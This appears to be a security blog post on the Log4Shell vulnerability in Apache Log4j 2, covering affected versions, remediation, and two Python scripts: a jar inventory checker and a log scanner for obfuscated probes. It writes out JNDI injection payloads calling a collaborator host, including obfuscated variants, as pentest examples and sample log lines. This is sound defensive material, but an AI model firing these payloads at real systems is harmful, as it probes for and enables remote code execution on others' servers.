Estimates at the time put the number of applications, consumer and enterprise services and websites exposed to the Log4j vulnerabilities at around three billion.
What is Log4j?
Log4j is an open-source Java logging library maintained by the Apache Software Foundation. It sits inside hugely popular products such as iCloud, Steam and Minecraft and inside millions of other applications, often as an indirect dependency that nobody chose deliberately, so the blast radius of a bug in it is enormous.
On 9 December 2021 a zero-day in Log4j 2 (the log4j-core artifact) became public: logging an attacker-controlled string, such as a User-Agent header, makes the library resolve a JNDI lookup embedded in that string, which leads to Remote Code Execution (RCE). The issue is tracked as CVE-2021-44228 and is popularly known as the "Log4Shell" vulnerability; two follow-up CVEs, CVE-2021-45046 (the 2.15.0 fix was incomplete in some non-default configurations) and CVE-2021-45105 (uncontrolled recursion in lookups, a denial of service in 2.16.0), were published in the days after it.
The JDK release also affects how easily the bug is exploited. On JDKs older than the releases listed below, the built-in LDAP client loads a Java class from a remote codebase named in the JNDI reply (com.sun.jndi.ldap.object.trustURLCodebase still defaulted to true), so a single lookup hands the attacker code execution:
Java 6 - 6u212
Java 7 - 7u202
Java 8 - 8u192
Java 11 - 11.0.2
If your log4j-core version is older than 2.17.0 (older than 2.12.3 on the Java 7 branch, or 2.3.1 on the Java 6 branch), you fall into the vulnerable category whatever the JDK says. A newer JDK only closes the remote-classloading shortcut: the JNDI reply can still deliver a serialized object or reference a factory class that is already on the application's classpath, and the lookup string can leak environment variables and system properties through DNS. Assume that your internet-facing infrastructure has already been probed, because attackers began mass-exploiting this vulnerability within hours of disclosure.
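Deciding "am I vulnerable?" in practice means finding every log4j-core jar in a deployment and comparing its version against the fixed release on its branch. The script below is an added example, not code from the original post or from the Log4j project. It assumes the version can be read from the Maven pom.properties or the Implementation-Version manifest attribute that official log4j-core jars carry, treats a jar below its branch threshold as mitigated only when JndiLookup.class has been removed from it, and uses small jars constructed in memory as sample input.

```python
"""Inventory log4j-core jars and decide whether each still needs action for
CVE-2021-44228, CVE-2021-45046 and CVE-2021-45105.

Added example (not from the original post). Assumptions: version metadata is
read from Maven's pom.properties or from Implementation-Version in the
manifest; an old jar counts as mitigated only when JndiLookup.class was
removed from it. Sample jars are constructed in memory.
"""
import io
import re
import zipfile
from pathlib import Path

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
MANIFEST = "META-INF/MANIFEST.MF"

# Lowest release per maintenance branch that addresses all three CVEs the
# post names: 2.17.0 (Java 8+), 2.12.3 (Java 7 backport), 2.3.1 (Java 6 backport).
BRANCH_FIXED = {(2, 12): (2, 12, 3), (2, 3): (2, 3, 1)}
MAIN_FIXED = (2, 17, 0)


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0) (pre-releases rank lowest)."""
    m = re.match(r"\s*(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    return tuple(int(part or 0) for part in m.groups())


def required_version(version):
    """Fixed release on the branch this version belongs to."""
    return BRANCH_FIXED.get(version[:2], MAIN_FIXED)


def read_version(zf):
    """Version string from pom.properties, falling back to the manifest."""
    names = set(zf.namelist())
    if POM_PROPERTIES in names:
        for line in zf.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                return line.split("=", 1)[1].strip()
    if MANIFEST in names:
        m = re.search(r"^Implementation-Version:\s*(\S+)",
                      zf.read(MANIFEST).decode("utf-8", "replace"), re.M)
        if m:
            return m.group(1)
    return None


def assess_jar_bytes(data):
    """Classify one jar as 'fixed', 'mitigated', 'vulnerable' or 'unknown'."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        version = read_version(zf)
        has_jndi_lookup = JNDI_LOOKUP_CLASS in zf.namelist()
    result = {"version": version, "jndi_lookup_present": has_jndi_lookup}
    if version is None:
        result["status"] = "unknown"      # shaded/uber jar: inspect by hand
        return result
    parsed = parse_version(version)
    if parsed >= required_version(parsed):
        result["status"] = "fixed"        # 2.17.0+ still ships the class, JNDI is off
    elif not has_jndi_lookup:
        result["status"] = "mitigated"    # class deleted; upgrade anyway
    else:
        result["status"] = "vulnerable"
        result["upgrade_to"] = ".".join(map(str, required_version(parsed)))
    return result


def scan_directory(root):
    """Walk a deployment and assess every log4j-core jar found under it."""
    return {str(p): assess_jar_bytes(p.read_bytes())
            for p in Path(root).rglob("log4j-core*.jar")}


def build_sample_jar(version, include_jndi_lookup=True):
    """Constructed stand-in for a real log4j-core jar (metadata entries only)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(MANIFEST, f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
        zf.writestr(POM_PROPERTIES, f"version={version}\ngroupId=org.apache.logging.log4j\n")
        if include_jndi_lookup:
            zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")  # placeholder bytes
    return buf.getvalue()


if __name__ == "__main__":
    for ver, keep in [("2.14.1", True), ("2.14.1", False), ("2.15.0", True),
                      ("2.12.2", True), ("2.17.0", True)]:
        print(ver, assess_jar_bytes(build_sample_jar(ver, keep)))
```

Point scan_directory at an application's deployment root on the running host rather than at the build tree: appliances, uber-jars and transitive dependencies carry their own copies. A jar reported as "unknown" (no Maven or manifest metadata, typical for shaded jars) still needs a manual look, and the presence flag for JndiLookup.class tells you whether the class-removal mitigation has been applied to it.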
How bad is it? The simple answer is "very bad"! The Log4Shell vulnerability was first spotted in Minecraft, where Microsoft rolled out an emergency patch to quickly fix the issue. TechCrunch also reported that big names like Apple, Amazon, Twitter and Cloudflare were vulnerable to Log4Shell attacks. As per TechCrunch, "The Computer Emergency Response Team (CERT) for New Zealand, Deutsche Telekom's CERT, and the Greynoise web monitoring service have all warned that attackers are actively looking for servers vulnerable to Log4Shell attacks. According to the latter, around 100 distinct hosts are scanning the internet for ways to exploit the Log4j vulnerability."
With Log4j being a Java library, a very large share of the systems that run Java, from application servers to embedded devices, can be exposed to this exploit. Big-name companies and services like Cisco, Steam, VMware, Apple iCloud, Minecraft, Tesla and others have already been found to be vulnerable.
Anyone whose application pulls in log4j-core 2.x, directly or as a transitive dependency of another library, is at risk. That includes Spring Boot applications: Spring Boot logs through Logback by default, but it is commonly switched to Log4j 2 via spring-boot-starter-log4j2. What matters is the logging library that actually formats your messages, not the web framework in front of it.
Attackers (and your own pentesters) detect this vulnerability by inserting a payload such as "${jndi:ldap://xyz.burpcollaborator.net/a}" into anything that might end up in a log line: query parameters, the User-Agent and Referer headers, X-Forwarded-For, the search bar, login forms and other input fields. If the collaborator host receives a DNS or LDAP interaction, a vulnerable Log4j instance evaluated the lookup. Two caveats when testing: the lookup fires wherever the value is eventually logged, which may be a backend service or an asynchronous job rather than the front end, so allow time for the interaction to arrive; and real attackers wrap the keyword in nested lookups such as "${${lower:j}ndi:...}" or URL-encode it to slip past simple string matching, so detection rules must not rely on the literal text "jndi:".
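For the defensive side of the same check, the scanner below walks web server log lines, undoes the common evasions (URL encoding, ${lower:..}/${upper:..} wrappers and the ${..:-x} default-value trick) and reports the decoded payload together with the callback host it would contact. It is an added example, not code from the original post; the log lines are constructed, the callback host is the placeholder from the post, and the set of lookups it unwraps is an assumption that covers the evasions most often seen in the wild rather than every Log4j lookup type.

```python
"""Find Log4Shell probes in web server logs, including obfuscated forms.

Added example (not from the original post). Assumptions: one request per
line; URL-encoded payloads are decoded first; only ${lower:..}, ${upper:..}
and the ${..:-default} lookups are unwrapped. Sample lines are constructed.
"""
import re
from urllib.parse import unquote

# Constructed sample lines in combined log format (not real traffic).
SAMPLE_LOG_LINES = [
    # 0: plain probe in the User-Agent header
    '203.0.113.7 - - [10/Dec/2021:03:12:41 +0000] "GET / HTTP/1.1" 200 1234 "-" '
    '"${jndi:ldap://xyz.burpcollaborator.net/a}"',
    # 1: case-lookup obfuscation in a query parameter
    '203.0.113.7 - - [10/Dec/2021:03:12:42 +0000] "GET /login?user=${${lower:j}ndi:'
    '${lower:l}${lower:d}${lower:a}${lower:p}://xyz.burpcollaborator.net/b} HTTP/1.1" '
    '200 1234 "-" "Mozilla/5.0"',
    # 2: default-value obfuscation in the Referer header
    '203.0.113.7 - - [10/Dec/2021:03:12:43 +0000] "GET / HTTP/1.1" 200 1234 '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xyz.burpcollaborator.net/c}" '
    '"curl/7.79.1"',
    # 3: benign request that happens to contain a ${...} placeholder
    '198.51.100.9 - - [10/Dec/2021:03:13:00 +0000] "GET /pricing?plan=${PLAN} HTTP/1.1" '
    '200 5678 "-" "Mozilla/5.0"',
    # 4: URL-encoded probe in the query string
    '203.0.113.7 - - [10/Dec/2021:03:13:05 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F'
    'xyz.burpcollaborator.net%2Fd%7D HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
]

# Innermost lookups only (no nested "${" or "}" inside); applied repeatedly so
# that nesting of any depth collapses from the inside out.
CASE_LOOKUP = re.compile(r"\$\{\s*(lower|upper)\s*:([^${}]*)\}", re.I)
DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
JNDI_PAYLOAD = re.compile(r"\$\{\s*jndi\s*:[^}]*\}?", re.I)
CALLBACK_HOST = re.compile(r"[a-z][a-z0-9+.-]*://([^/:\s}]+)", re.I)


def normalize(text):
    """URL-decode, then unwrap lookups until the text stops changing."""
    text = unquote(text)
    previous = None
    while previous != text:
        previous = text
        text = CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text)
        text = DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
    return text


def find_jndi_payloads(line):
    """Decoded ${jndi:...} payloads found in one log line (empty if none)."""
    return [m.group(0) for m in JNDI_PAYLOAD.finditer(normalize(line))]


def callback_host(payload):
    """Host the server would reach out to if it evaluated the payload, or None."""
    m = CALLBACK_HOST.search(payload)
    return m.group(1) if m else None


def scan_log_lines(lines):
    """One hit per payload: line index, decoded payload and callback host."""
    hits = []
    for index, line in enumerate(lines):
        for payload in find_jndi_payloads(line):
            hits.append({"line": index, "payload": payload,
                         "callback_host": callback_host(payload)})
    return hits


if __name__ == "__main__":
    for hit in scan_log_lines(SAMPLE_LOG_LINES):
        print(f"line {hit['line']}: {hit['payload']} -> {hit['callback_host']}")
```

scan_log_lines accepts any iterable of strings, so an open log file can be passed directly. The callback hosts it extracts are the indicators worth blocking at the egress firewall and hunting for in DNS and proxy logs; an outbound LDAP or RMI connection from an application server to one of them means the lookup was evaluated, not merely received.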
As a stopgap for log4j-core 2.10 through 2.14.1, message lookups can be switched off by starting the JVM with the system property log4j2.formatMsgNoLookups=true, or by setting the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS=true; the spelling given in some early advisories, log4j.format.msg.nolookups, is not a property Log4j recognises. This flag has no effect on versions before 2.10, and CVE-2021-45046 showed that it does not cover every configuration (thread-context values referenced from a pattern layout are still evaluated), so Apache's recommended mitigation when an upgrade is not immediately possible is to delete the class org/apache/logging/log4j/core/lookup/JndiLookup.class from every log4j-core jar.
The proper remediation is to update log4j-core to 2.17.0 or later (2.12.3 or later on the Java 7 branch, 2.3.1 or later on Java 6): from 2.16.0 onwards message lookups are removed and JNDI access is disabled unless explicitly enabled, and 2.17.0 also fixes the recursion issue. Rebuild and redeploy, then verify on the running system rather than in the build file, since vendor appliances, uber-jars and transitive dependencies can each carry their own copy of the library.
Stay tuned for more information and updates on this blog.